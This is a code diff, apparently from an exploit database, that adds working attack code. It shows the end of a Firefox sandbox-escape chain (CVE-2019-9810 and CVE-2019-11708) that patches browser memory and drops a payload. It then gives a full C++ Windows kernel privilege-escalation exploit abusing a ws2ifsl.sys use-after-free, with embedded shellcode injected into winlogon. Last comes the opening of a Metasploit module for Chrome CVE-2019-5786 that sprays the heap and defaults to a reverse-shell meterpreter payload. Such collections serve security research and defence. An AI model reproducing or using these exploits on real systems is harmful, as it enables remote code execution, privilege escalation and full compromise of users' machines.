+    //   00007ff9`3f9c55cc 83f9ff          cmp     ecx,0FFFFFFFFh
+    //   00007ff9`3f9c55cf 7520            jne     xul!mozilla::net::nsSocketTransport::InitiateSocket+0x111 (00007ff9`3f9c55f1)
+    //
+    // 0:051> ? xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 - xul
+    // Evaluate expression: 1529286 = 00000000`001755c6
+    //
+
+    const PatchOffset = 0x001755c6n;
+    const XulBase = BigInt(GetModuleHandleA('xul.dll').toString());
+    const PatchAddress = XulBase + PatchOffset;
+    const PatchContent = [0x90, 0x90, 0x90, 0x48, 0x31, 0xc9];
+    PatchCode(PatchAddress, PatchContent);
+}
+
+function Main(Route) {
+
+    //
+    // One way to tell if we were successful with our data corruption is by checking
+    // if we have access to the PrivilegeManager. If we do, it means we are running
+    // with a privileged context, if not we don't.
+    //
+
+    const RunningFromPrivilegedJS = window.netscape.security.PrivilegeManager != undefined;
+    if(Route == '?stage1') {
+
+        //
+        // If we are asked to run stage1 with access to a privileged context, we skip
+        // it and move on to stage2.
+        //
+
+        if(RunningFromPrivilegedJS) {
+            return Main('?stage2');
+        }
+
+        //
+        // Stage1 exploits CVE-2019-9810 and performs a data corruption attack to access
+        // a privileged JS context.
+        //
+
+        if(!ExploitCVE_2019_9810()) {
+            console.log('Failed :(');
+            return;
+        }
+
+        //
+        // Once we are done with the data corruption, we refresh the page to get access
+        // to the privileged JS context. Moving on to stage2 \o/.
+        //
+
+        location.replace(`${location.origin}/?stage2`);
+    }
+
+    if(Route == '?stage2') {
+
+        //
+        // At this point we expect to have access to a privileged JS context.
+        // If we don't it's probably bad news, so we'll just bail.
+        //
+
+        if(!RunningFromPrivilegedJS) {
+            alert('problem');
+            return;
+        }
+
+        //
+        // Turn on privileges so that we can access the `Components` object.
+        //
+
+        window.netscape.security.PrivilegeManager.enablePrivilege('doar-e');
+
+
+        //
+        // Before going further, let's fix xul!mozilla::net::nsSocketTransport::InitiateSocket
+        // to avoid the Firefox being unhappy.
+        //
+
+        PatchInitiateSocket()
+
+        //
+        // Now that we have access to the privileged context, we are also able to talk
+        // over the frame message manager IPC and trigger CVE-2019-11708 to escape the
+        // exploit the parent process.
+        //
+
+        TriggerCVE_2019_11708();
+    }
+
+    if(Route == '?stage3') {
+
+        //
+        // We should now be running in the broker which means we can exploit CVE-2019-9810
+        // to perform the same attack than in stage1 but this time in the parent process.
+        //
+
+        if(!ExploitCVE_2019_9810()) {
+            console.log('Elevation failed, closing the window.');
+            window.close();
+        }
+
+        //
+        // If we are successful it means that by refreshing the page, we should have
+        // access to the privileged JS context from the parent process.
+        // This basically means full compromise and we move on to backdooring the tabs,
+        // as well as dropping the payload.
+        //
+
+        location.replace(`${location.origin}/?final`);
+    }
+
+    if(Route == '?final') {
+
+        //
+        // All right, we start of by turning on privileges so that we can access `Components`
+        // & cie.
+        //
+
+        window.netscape.security.PrivilegeManager.enablePrivilege('doar-e');
+
+        //
+        // Before going further, let's fix xul!mozilla::net::nsSocketTransport::InitiateSocket
+        // to avoid the Firefox being unhappy.
+        //
+
+        PatchInitiateSocket()
+
+        //
+        // We've worked hard to get here and it's time to drop the goodies :).
+        //
+
+        Payload();
+    }
+}
+
+function Onload() {
+    if(location.search != '') {
+        Main(location.search);
+    }
+}
\ No newline at end of file
diff --git a/exploits/windows_x86-64/local/47935.cpp b/exploits/windows_x86-64/local/47935.cpp
new file mode 100644
index 000000000..3e98bd130
--- /dev/null
+++ b/exploits/windows_x86-64/local/47935.cpp
@@ -0,0 +1,707 @@
+/*
+The exploit works on 19H1.
+It was tested with ntoskrnl version 10.0.18362.295
+
+EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47935.zip
+*/
+
+#include <Windows.h>
+#include <stdio.h>
+#include <string>
+#include <ntstatus.h>
+#include <processthreadsapi.h>
+#include <winternl.h>
+#include <tlhelp32.h>
+
+#pragma comment(lib, "ntdll.lib")
+
+// run cmd.exe
+unsigned char shellcode[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51" \
+"\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \
+"\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0" \
+"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed" \
+"\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88" \
+"\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44" \
+"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" \
+"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1" \
+"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44" \
+"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49" \
+"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a" \
+"\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" \
+"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00" \
+"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" \
+"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" \
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47" \
+"\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64\x2e\x65" \
+"\x78\x65\x00";
+
+static const unsigned int shellcode_len = 0x1000;
+
+#define MAXIMUM_FILENAME_LENGTH 255 
+#define SystemModuleInformation  0xb
+#define SystemHandleInformation 0x10
+
+typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
+{
+	ULONG ProcessId;
+	UCHAR ObjectTypeNumber;
+	UCHAR Flags;
+	USHORT Handle;
+	void* Object;
+	ACCESS_MASK GrantedAccess;
+} SYSTEM_HANDLE, * PSYSTEM_HANDLE;
+
+typedef struct _SYSTEM_HANDLE_INFORMATION
+{
+	ULONG NumberOfHandles;
+	SYSTEM_HANDLE Handels[1];
+} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
+
+typedef struct SYSTEM_MODULE {
+	ULONG                Reserved1;
+	ULONG                Reserved2;
+#ifdef _WIN64
+	ULONG				Reserved3;
+#endif
+	PVOID                ImageBaseAddress;
+	ULONG                ImageSize;
+	ULONG                Flags;
+	WORD                 Id;
+	WORD                 Rank;
+	WORD                 w018;
+	WORD                 NameOffset;
+	CHAR                 Name[MAXIMUM_FILENAME_LENGTH];
+}SYSTEM_MODULE, * PSYSTEM_MODULE;
+
+typedef struct SYSTEM_MODULE_INFORMATION {
+	ULONG                ModulesCount;
+	SYSTEM_MODULE        Modules[1];
+} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
+
+// exploit specific type information 
+typedef struct _FILE_FULL_EA_INFORMATION {
+	ULONG NextEntryOffset;		// +0x0
+	UCHAR Flags;				// +4
+	UCHAR EaNameLength;			// +5
+	USHORT EaValueLength;		// +6
+	CHAR EaName[1];				// +9
+} FILE_FULL_EA_INFORMATION, * PFILE_FULL_EA_INFORMATION;
+
+typedef struct _PROC_DATA {
+	HANDLE apcthread;				// +0x0
+	void* unknown1;				// +0x8
+	void* unknown2;				// +0x10
+	void* unknown3;				// +0x18
+	void* unknown4;				// +0x20
+} PROC_DATA, * PPROC_DATA;
+
+typedef struct _SOCK_DATA {
+	HANDLE unknown;				// +0x0
+	HANDLE procDataHandle;	// +0x8	
+} SOCK_DATA, * PSOCK_DATA;
+
+// undocumented apis definitions 
+
+typedef NTSTATUS(WINAPI* NtWriteFile_t)(HANDLE FileHandle,
+	HANDLE Event,
+	PIO_APC_ROUTINE ApcRoutine,
+	PVOID ApcContext,
+	PIO_STATUS_BLOCK IoStatusBlock,
+	PVOID Buffer,
+	ULONG Length,
+	PLARGE_INTEGER ByteOffset,
+	PULONG key);
+
+typedef NTSTATUS(WINAPI* NtTestAlert_t)(void);
+
+typedef NTSTATUS(WINAPI* RtlGetVersion_t)(PRTL_OSVERSIONINFOW lpVersionInformation);
+
+// resolved function pointers at runtime
+NtTestAlert_t g_NtTestAlert = 0;
+NtWriteFile_t g_NtWriteFile = 0;
+RtlGetVersion_t g_RtlGetVersion = 0;
+
+HANDLE	g_Event1 = NULL;
+HANDLE	g_Event2 = NULL;
+HANDLE	g_Event3 = NULL;
+
+int g_done1 = 0;
+int g_done2 = 0;
+
+#define TOKEN_OFFSET 0x40			//_SEP_TOKEN_PRIVILEGES offset
+#define OFFSET_LINKEDLIST 0xA8		//kthread apc offset
+
+// generic helper function
+
+void InjectToWinlogon()
+{
+	PROCESSENTRY32 entry;
+	entry.dwSize = sizeof(PROCESSENTRY32);
+
+	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
+
+	int pid = -1;
+	if (Process32First(snapshot, &entry))
+	{
+		while (Process32Next(snapshot, &entry))
+		{			
+			if (_strcmpi(entry.szExeFile, "winlogon.exe") == 0)
+			{
+				pid = entry.th32ProcessID;
+				break;
+			}
+		}
+	}
+
+	CloseHandle(snapshot);
+
+	if (pid < 0)
+	{
+		printf("Could not find process\n");
+		return;
+	}
+
+	HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
+	if (!h)
+	{
+		printf("Could not open process: %x", GetLastError());
+		return;
+	}
+	
+	void* buffer = VirtualAllocEx(h, NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (!buffer)
+	{
+		printf("[-] VirtualAllocEx failed\n");
+	}
+	
+	if (!buffer)
+	{
+		printf("[-] remote allocation failed");
+		return;
+	}
+
+	if (!WriteProcessMemory(h, buffer, shellcode, sizeof(shellcode), 0))
+	{
+		printf("[-] WriteProcessMemory failed");
+		return;
+	}
+
+	HANDLE hthread = CreateRemoteThread(h, 0, 0, (LPTHREAD_START_ROUTINE)buffer, 0, 0, 0);
+
+	if (hthread == INVALID_HANDLE_VALUE)
+	{
+		printf("[-] CreateRemoteThread failed");
+		return;
+	}
+}
+
+HMODULE GetNOSModule()
+{
+	HMODULE hKern = 0;
+	hKern = LoadLibraryEx("ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
+	return hKern;
+}
+
+DWORD64 GetModuleAddr(const char* modName)
+{
+	PSYSTEM_MODULE_INFORMATION buffer = (PSYSTEM_MODULE_INFORMATION)malloc(0x20);
+
+	DWORD outBuffer = 0;
+	NTSTATUS status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, buffer, 0x20, &outBuffer);
+
+	if (status == STATUS_INFO_LENGTH_MISMATCH)
+	{
+		free(buffer);
+		buffer = (PSYSTEM_MODULE_INFORMATION)malloc(outBuffer);
+		status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, buffer, outBuffer, &outBuffer);
+	}
+
+	if (!buffer)
+	{
+		printf("[-] NtQuerySystemInformation error\n");
+		return 0;
+	}
+
+	for (unsigned int i = 0; i < buffer->ModulesCount; i++)
+	{
+		PVOID kernelImageBase = buffer->Modules[i].ImageBaseAddress;
+		PCHAR kernelImage = (PCHAR)buffer->Modules[i].Name;		
+		if (_stricmp(kernelImage, modName) == 0)
+		{
+			free(buffer);
+			return (DWORD64)kernelImageBase;
+		}
+	}
+	free(buffer);
+	return 0;
+}
+
+
+DWORD64 GetKernelPointer(HANDLE handle, DWORD type)
+{
+	PSYSTEM_HANDLE_INFORMATION buffer = (PSYSTEM_HANDLE_INFORMATION) malloc(0x20);
+
+	DWORD outBuffer = 0;
+	NTSTATUS status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, 0x20, &outBuffer);
+
+	if (status == STATUS_INFO_LENGTH_MISMATCH)
+	{
+		free(buffer);
+		buffer = (PSYSTEM_HANDLE_INFORMATION) malloc(outBuffer);
+		status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, outBuffer, &outBuffer);
+	}
+
+	if (!buffer)
+	{
+		printf("[-] NtQuerySystemInformation error \n");
+		return 0;
+	}
+
+	for (size_t i = 0; i < buffer->NumberOfHandles; i++)
+	{
+		DWORD objTypeNumber = buffer->Handels[i].ObjectTypeNumber;
+
+		if (buffer->Handels[i].ProcessId == GetCurrentProcessId() && buffer->Handels[i].ObjectTypeNumber == type)
+		{
+			if (handle == (HANDLE)buffer->Handels[i].Handle)
+			{
+				//printf("%p %d %x\n", buffer->Handels[i].Object, buffer->Handels[i].ObjectTypeNumber, buffer->Handels[i].Handle);
+				DWORD64 object = (DWORD64)buffer->Handels[i].Object;
+				free(buffer);
+				return object;
+			}
+		}
+	}
+	printf("[-] handle not found\n");
+	free(buffer);
+	return 0;
+}
+
+DWORD64 GetGadgetAddr(const char* name)
+{
+	DWORD64 base = GetModuleAddr("\\SystemRoot\\system32\\ntoskrnl.exe");
+	HMODULE mod = GetNOSModule();
+	if (!mod)
+	{
+		printf("[-] leaking ntoskrnl version\n");
+		return 0;
+	}
+	DWORD64 offset = (DWORD64)GetProcAddress(mod, name);
+
+	DWORD64 returnValue = base + offset - (DWORD64)mod;
+	FreeLibrary(mod);
+	return returnValue;
+}
+
+/*	
+	After the bug is triggerd the first thime, this threads gets notified and it will trigger its function pointer,
+	which will call our gadget function and write the first 8 bytes.
+*/
+DWORD WINAPI APCThread1(LPVOID lparam)
+{
+	SetEvent(g_Event1);
+	while (1)
+	{
+		if (g_done1)
+		{
+			printf("[+] triggering first APC execution\n");
+			
+			g_NtTestAlert();		
+
+			while (1)
+			{
+				Sleep(0x1000);
+			}
+		}
+		else
+		{
+			Sleep(1);
+		}
+	}
+	return 0;
+}
+
+/*
+	After the bug is triggerd the second thime, this threads gets notified and it will trigger its function pointer again and write the second 8 bytes.
+	After that the shellcode is injected into the system process.
+*/
+DWORD WINAPI APCThread2(LPVOID lparam)
+{
+	SetEvent(g_Event2);
+	while (1)
+	{
+		if (g_done2)
+		{
+			printf("[+] triggering second APC execution\n");
+						
+			g_NtTestAlert();
+
+			InjectToWinlogon();
+			SetEvent(g_Event3);
+
+			while (1)
+			{
+				Sleep(0x1000);
+			}
+		}
+		else
+		{
+			Sleep(1);
+		}
+	}
+	return 0;
+}
+
+HANDLE CreateSocketHandle(HANDLE procHandle)
+{
+	HANDLE fileHandle = 0;
+	UNICODE_STRING deviceName;
+	OBJECT_ATTRIBUTES object;
+	IO_STATUS_BLOCK IoStatusBlock;
+
+	RtlInitUnicodeString(&deviceName, (PWSTR)L"\\Device\\WS2IFSL\\NifsSct");
+
+	InitializeObjectAttributes(&object, &deviceName, 0, NULL, NULL);
+
+	FILE_FULL_EA_INFORMATION* eaBuffer = (FILE_FULL_EA_INFORMATION*)malloc(sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") + sizeof(SOCK_DATA));
+	if (!eaBuffer)
+	{
+		printf("[-] malloc error\n");
+		return fileHandle;
+	}
+	eaBuffer->NextEntryOffset = 0;
+	eaBuffer->Flags = 0;
+	eaBuffer->EaNameLength = sizeof("NifsSct") - 1;
+	eaBuffer->EaValueLength = sizeof(SOCK_DATA);
+
+	RtlCopyMemory(eaBuffer->EaName, "NifsSct", (SIZE_T)eaBuffer->EaNameLength + 1);
+
+	SOCK_DATA * eaData = (SOCK_DATA*)(((char*)eaBuffer) + sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") - 4);
+
+	eaData->unknown = (void*) 0x242424224;
+	eaData->procDataHandle = (void*) procHandle;
+
+	NTSTATUS status = NtCreateFile(&fileHandle, GENERIC_WRITE, &object, &IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, 0, eaBuffer, sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") + sizeof(PROC_DATA));
+	if (status != STATUS_SUCCESS)
+	{
+		printf("[-] NtCreateFile error: %x \n", status);
+		free(eaBuffer);
+		return fileHandle;
+	}
+
+	free(eaBuffer);
+	return fileHandle;
+}
+
+HANDLE CreateProcessHandle(HANDLE hAPCThread)
+{
+	HANDLE fileHandle = 0;
+	UNICODE_STRING deviceName;
+	OBJECT_ATTRIBUTES object;
+	IO_STATUS_BLOCK IoStatusBlock;
+
+	RtlInitUnicodeString(&deviceName, (PWSTR)L"\\Device\\WS2IFSL\\NifsPvd");
+
+	InitializeObjectAttributes(&object, &deviceName, 0, NULL, NULL);
+
+	FILE_FULL_EA_INFORMATION* eaBuffer = (FILE_FULL_EA_INFORMATION*)malloc(sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") + sizeof(PROC_DATA));
+	if (!eaBuffer)
+	{
+		printf("[-] malloc error\n");
+		return fileHandle;
+	}
+	eaBuffer->NextEntryOffset = 0;
+	eaBuffer->Flags = 0;
+	eaBuffer->EaNameLength = sizeof("NifsPvd") - 1;
+	eaBuffer->EaValueLength = sizeof(PROC_DATA);
+
+	RtlCopyMemory(eaBuffer->EaName, "NifsPvd", (SIZE_T)eaBuffer->EaNameLength + 1);
+	PROC_DATA * eaData = (PROC_DATA*)(((char*)eaBuffer) + sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") - 4);
+
+	if (!hAPCThread)
+	{
+		printf("[-] error thread not found\n");
+		free(eaBuffer);
+		return 0;
+	}
+
+	eaData->apcthread = (void*) hAPCThread;		// thread must be in current process
+	eaData->unknown1 = (void*) 0x2222222;		// APC Routine
+	eaData->unknown2 = (void*) 0x3333333;		// cancel Rundown Routine
+	eaData->unknown3 = (void*) 0x4444444;
+	eaData->unknown4 = (void*) 0x5555555;
+
+	NTSTATUS status = NtCreateFile(&fileHandle, MAXIMUM_ALLOWED, &object, &IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, 0, eaBuffer, sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") + sizeof(PROC_DATA));
+	if (status != STATUS_SUCCESS)
+	{
+		printf("[-] NtCreateFile error: %x \n", status);
+		free(eaBuffer);
+		return fileHandle;
+	}
+
+	free(eaBuffer);
+	return fileHandle;
+}
+
+int DoHeapSpray(DWORD64 writeAddress, DWORD64 kthreadAddress)
+{	
+	DWORD64 nopPointer = GetGadgetAddr("xHalTimerWatchdogStop");
+	if (!nopPointer)
+	{
+		printf("[-] SeSetAccessStateGenericMapping not found\n");
+		return 0;
+	}
+
+	DWORD64 funPointer = GetGadgetAddr("SeSetAccessStateGenericMapping");
+	if (!funPointer)
+	{
+		printf("[-] SeSetAccessStateGenericMapping not found\n");
+		return 0;
+	}	
+
+	UCHAR payload[0x120 - 0x48];
+	memset(payload, 0x0, sizeof(payload));	   
+		
+	DWORD64 x = 0x41414141414141;				
+	memcpy(payload, &x, 8);
+	
+	x = 0x12121212;								
+	memcpy(payload + 8, &x, 8);
+	
+	x = kthreadAddress + OFFSET_LINKEDLIST;		// apc linked list 
+	memcpy(payload + 0x10, &x, 8);
+	
+	x = kthreadAddress + OFFSET_LINKEDLIST;
+	memcpy(payload + 0x18, &x, 8);
+	
+	x = funPointer;
+	memcpy(payload + 0x20, &x, 8);				// this is the RIP we want to execute, in case of NtTestAlert
+
+	x = nopPointer;
+	memcpy(payload + 0x28, &x, 8);				// this is the RIP we want to execute, in case of rundown routine 
+	
+	x = 0xffffffffffffffff;						// this is to be written
+	memcpy(payload + 0x30, &x, 8);
+	
+	x = 0xffffffffffffffff;						// this is to be written, but it gets changed..
+	memcpy(payload + 0x38, &x, 8);
+	
+	x = 0x2424242424242424;
+	memcpy(payload + 0x40, &x, 8);
+	
+	x = writeAddress;							// this is where to write 
+	memcpy(payload + 0x48, &x, 8);
+ 
+	for (size_t i = 0; i < 0x70; i++)
+	{
+		HANDLE readPipe;
+		HANDLE writePipe;
+		DWORD resultLength = 0;
+	
+		BOOL res = CreatePipe(&readPipe, &writePipe, NULL, sizeof(payload));
+		if (!res)
+		{
+			printf("[-] error creating pipe\n");
+			return 0;
+		}
+		res = WriteFile(writePipe, payload, sizeof(payload), &resultLength, NULL);
+	}
+
+	return 1;
+}
+
+/*
+	This function will trigger the use after free in ws2ifsl.sys and
+	will try to reallocate the buffer with controlled content.
+*/
+void TriggerBug(HANDLE threadHandle, DWORD64 writeAddress, DWORD64 kthreadAddress, int id)
+{
+	HANDLE procHandle = CreateProcessHandle(threadHandle);
+	printf("[!] procHandle %x\n", (DWORD)procHandle);
+
+	HANDLE sockHandle = CreateSocketHandle(procHandle);
+	printf("[!] sockHandle %x\n", (DWORD)sockHandle);
+
+	char* readBuffer = (char*)malloc(0x100);
+	DWORD bytesRead = 0;
+
+	IO_STATUS_BLOCK io;
+	LARGE_INTEGER byteOffset;
+	byteOffset.HighPart = 0;
+	byteOffset.LowPart = 0;
+	byteOffset.QuadPart = 0;
+	byteOffset.u.LowPart = 0;
+	byteOffset.u.HighPart = 0;
+	ULONG key = 0;
+
+	CloseHandle(procHandle);
+
+	NTSTATUS ret = g_NtWriteFile(sockHandle, 0, 0, 0, &io, readBuffer, 0x100, &byteOffset, &key);
+
+	// this close the objecte and we trigger the use after free
+	CloseHandle(sockHandle);
+
+	// this spray will reclaim the buffer
+	if (!DoHeapSpray(writeAddress, kthreadAddress))
+	{
+		printf("[-] error doHeapSpray\n");
+		return;
+	}
+
+	if (id == 1)
+	{
+		g_done1 = 1;
+	}
+
+	if (id == 2)
+	{
+		g_done2 = 1;
+	}
+
+	printf("[+] done\n");
+	Sleep(0x20);
+	free(readBuffer);
+
+	return;
+}
+
+/*
+	This function resolves all function pointer for native api calls.
+*/
+bool InitFunctionPointers()
+{
+	HMODULE hNtDll = NULL;
+	hNtDll = LoadLibrary("ntdll.dll");
+	if (!hNtDll)
+	{
+		printf("error\n");
+		return false;
+	}
+
+	g_NtTestAlert = (NtTestAlert_t)GetProcAddress(hNtDll, "NtTestAlert");
+	if (!g_NtTestAlert)
+	{
+		printf("error\n");
+		return false;
+	}
+
+	g_NtWriteFile = (NtWriteFile_t)GetProcAddress(hNtDll, "NtWriteFile");
+	if (!g_NtWriteFile)
+	{
+		printf("[-] GetProcAddress() NtWriteFile failed.\n");
+		return false;
+	}
+
+	g_RtlGetVersion = (RtlGetVersion_t)GetProcAddress(hNtDll, "RtlGetVersion");
+	if (!g_NtWriteFile)
+	{
+		printf("[-] GetProcAddress() RtlGetVersion failed.\n");
+		return false;
+	}
+
+	return true;
+}
+
+int main()
+{
+	// intialize event for thread synchronization
+	g_Event1 = CreateEvent(0, 0, 0, 0);
+	g_Event2 = CreateEvent(0, 0, 0, 0);
+	g_Event3 = CreateEvent(0, 0, 0, 0);
+
+	if (g_Event1 == INVALID_HANDLE_VALUE || !g_Event1)
+	{
+		printf("[-] CreateEvent failed\n");
+		return 0;
+	}
+	if (g_Event2 == INVALID_HANDLE_VALUE || !g_Event2)
+	{
+		printf("[-] CreateEvent failed\n");
+		return 0;
+	}
+	if (g_Event3 == INVALID_HANDLE_VALUE || !g_Event2)
+	{
+		printf("[-] CreateEvent failed\n");
+		return 0;
+	}
+
+	if (!InitFunctionPointers())
+	{
+		printf("[-] InitFunctionPointers failed\n");
+		return 0;
+	}
+
+	HANDLE proc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId());
+	if (!proc)
+	{
+		printf("[-] OpenProcess failed\n");
+		return 0;
+	}
+	HANDLE token = 0;
+	if (!OpenProcessToken(proc, TOKEN_ADJUST_PRIVILEGES, &token))
+	{
+		printf("[-] OpenProcessToken failed\n");
+		return 0;
+	}	
+
+	DWORD64 ktoken = GetKernelPointer(token, 0x5);
+	DWORD64 where = ktoken + TOKEN_OFFSET;
+
+	printf("[+] found token at: %p\n", (DWORD64) ktoken);
+
+
+	// check the supported version of this exploit, otherwise we would crash
+	RTL_OSVERSIONINFOW osversion;
+	g_RtlGetVersion(&osversion);
+	
+	if (osversion.dwMajorVersion == 10 && osversion.dwBuildNumber == 18362)
+	{
+		printf("[+] version supported\n");
+	}
+	else
+	{
+		printf("[-] sorry version not supported\n");
+		return 0;
+	}
+
+	HANDLE hAPCThread1 = CreateThread(0, 0, APCThread1, 0, 0, 0);
+	if (hAPCThread1 == INVALID_HANDLE_VALUE || !hAPCThread1)
+	{
+		printf("[-] error CreateThread\n");
+		return 0;
+	}
+
+	HANDLE hAPCThread2 = CreateThread(0, 0, APCThread2, 0, 0, 0);
+	if (hAPCThread2 == INVALID_HANDLE_VALUE || !hAPCThread2)
+	{
+		printf("[-] error CreateThread\n");
+		return 0;
+	}
+		
+	DWORD64 threadAddrAPC1 = GetKernelPointer(hAPCThread1, 0x8);
+	if (!threadAddrAPC1)
+	{
+		printf("[-] GetKernelPointer error \n");
+		return 0;
+	}
+	DWORD64 threadAddrAPC2 = GetKernelPointer(hAPCThread2, 0x8);
+	if (!threadAddrAPC2)
+	{
+		printf("[-] GetKernelPointer error \n");
+		return 0;
+	}
+
+	// wait for threads to be initialized
+	WaitForSingleObject(g_Event1, -1);
+	WaitForSingleObject(g_Event2, -1);
+
+	TriggerBug(hAPCThread1, where-8, threadAddrAPC1, 1);
+	TriggerBug(hAPCThread2, where, threadAddrAPC2, 2);
+
+	WaitForSingleObject(g_Event3, -1);
+	
+	ExitProcess(0);
+	
+	return 0;
+}
\ No newline at end of file
diff --git a/exploits/windows_x86/remote/46812.rb b/exploits/windows_x86/remote/46812.rb
new file mode 100755
index 000000000..e4108504e
--- /dev/null
+++ b/exploits/windows_x86/remote/46812.rb
@@ -0,0 +1,432 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86',
+      'Description'    => %q{
+        This exploit takes advantage of a use after free vulnerability in Google
+      Chrome 72.0.3626.119 running on Windows 7 x86.
+        The FileReader.readAsArrayBuffer function can return multiple references to the
+      same ArrayBuffer object, which can be freed and overwritten with sprayed objects.
+      The dangling ArrayBuffer reference can be used to access the sprayed objects,
+      allowing arbitrary memory access from Javascript. This is used to write and
+      execute shellcode in a WebAssembly object.
+        The shellcode is executed within the Chrome sandbox, so you must explicitly
+      disable the sandbox for the payload to be successful.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+          'Clement Lecigne', # discovery
+          'István Kurucsai', # Exodus Intel
+          'timwr',           # metasploit module
+        ],
+      'References'     => [
+          ['CVE', '2019-5786'],
+          ['URL', 'https://github.com/exodusintel/CVE-2019-5786'],
+          ['URL', 'https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/'],
+          ['URL', 'https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analysis-of-a-chrome-zero-day-cve-2019-5786/'],
+          ['URL', 'https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html'],
+        ],
+      'Arch'           => [ ARCH_X86 ],
+      'Platform'       => 'windows',
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },
+      'Targets'        => [ [ 'Automatic', { } ] ],
+      'DisclosureDate' => 'Mar 21 2019'))
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Sending #{request.uri}")
+    if request.uri =~ %r{/exploit.html$}
+      html = %Q^
+<html>
+    <head>
+        <script>
+let myWorker = new Worker('worker.js');
+let reader = null;
+spray = null;               // nested arrays used to hold the sprayed heap contents
+let onprogress_cnt = 0;     // number of times onprogress was called in a round
+let try_cnt = 0;            // number of rounds we tried
+let last = 0, lastlast = 0; // last two AB results from the read
+let tarray = 0;             // TypedArray constructed from the dangling ArrayBuffer
+const string_size = 128 * 1024 * 1024;
+let contents = String.prototype.repeat.call('Z', string_size);
+let f = new File([contents], "text.txt");
+const marker1 = 0x36313233;
+const marker2 = 0x37414546;
+
+const outers = 256;
+const inners = 1024;
+
+function allocate_spray_holders() {
+    spray = new Array(outers);
+    for (let i = 0; i < outers; i++) {
+        spray[i] = new Array(inners);
+    }
+}
+
+function clear_spray() {
+    for (let i = 0; i < outers; i++) {
+        for (let j = 0; j < inners; j++) {
+            spray[i][j] = null;
+        }
+    }
+}
+
+function reclaim_mixed() {
+    // spray the heap to reclaim the freed region
+    let tmp = {};
+    for (let i = 0; i < outers; i++) {
+        for (let j = 0; j + 2 < inners; j+=3) {
+            spray[i][j] = {a: marker1, b: marker2, c: tmp};
+            spray[i][j].c = spray[i][j]     // self-reference to find our absolute address
+            spray[i][j+1] = new Array(8);
+            spray[i][j+2] = new Uint32Array(32);
+        }
+    }
+}
+
+function find_pattern() {
+    const start_offset = 0x00afc000 / 4;
+    for (let i = start_offset; i + 1 < string_size / 4; i++) {
+        if (i < 50){
+            console.log(tarray[i].toString(16));
+        }
+        // multiply by two because of the way SMIs are stored
+        if (tarray[i] == marker1 * 2) {
+            if (tarray[i+1] == marker2 * 2) {
+                console.log(`found possible candidate objectat idx ${i}`);
+                return i;
+            }
+        }
